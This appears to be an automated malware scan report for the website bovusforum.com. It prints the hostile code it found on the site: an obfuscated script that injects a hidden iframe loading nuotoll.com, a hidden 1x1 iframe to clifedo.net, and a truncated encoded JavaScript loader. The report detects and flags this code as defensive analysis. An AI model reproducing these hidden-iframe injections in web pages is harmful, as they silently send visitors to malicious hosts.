Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bovusforum.com
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://bovusforum.com/ | 200 OK Content-Length: 4549 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: nuotoll.com
Decoded script:
var xew=453800543;var ghg45="nuot";var w="o";var re6="ll.";var h2h="com";var a="ifr";var s="htt";document.write('<'+a+'ame sr'+'c="'+s+'p://'+ghg45+''+w+''+re6+''+h2h+'/'+'" wid'+'th="1" h'+'eight="3"></if'+'rame>'); var jhr4=4324224
<iframe src="http://nuotoll.com/" width="1" height="3"></iframe>
Malicious iFrame found. size: 1x1 style: hidden src: http://clifedo.net/?click=7a0696
This URL is marked by Google as suspicious
<iframe src="http://clifedo.net/?click=7a0696" width=1 height=1 style="visibility:hidden;position:absolute">
http://bovusforum.com/test404page.js | 404 Not Found Content-Length: 2437 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- (function(){var y3Tm='v&61&72&20a&3d&22&53cr&69ptEn&67ine&22&2c&62&3d&22Ve&72si&6fn(&29+&22&2c&6a&3d&22&22&2cu&3d&6ea&76igator&2euserA&67ent&3b&69&66(&28u&2e&69&6ed&65x&4f&66(&22Win&22)&3e0&29&26&26&28u&2eindexO&66(&22NT&20&36&22)&3c0&29&26&26(do&63ument&2eco --> Antivirus reports:
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: bovusforum.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 22 Dec 2014 05:16:14 GMT
Accept-Ranges: bytes
ETag: "27d90b-11c5-4e57b10c3649e"
Server: Apache
Content-Length: 4549
Content-Type: text/html
Last-Modified: Tue, 03 Sep 2013 13:57:11 GMT
...4549 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: bovusforum.com
Referer: http://www.google.com/search?q=bovusforum.com
Result:
The result is similar to the first query. There are no suspicious redirects found.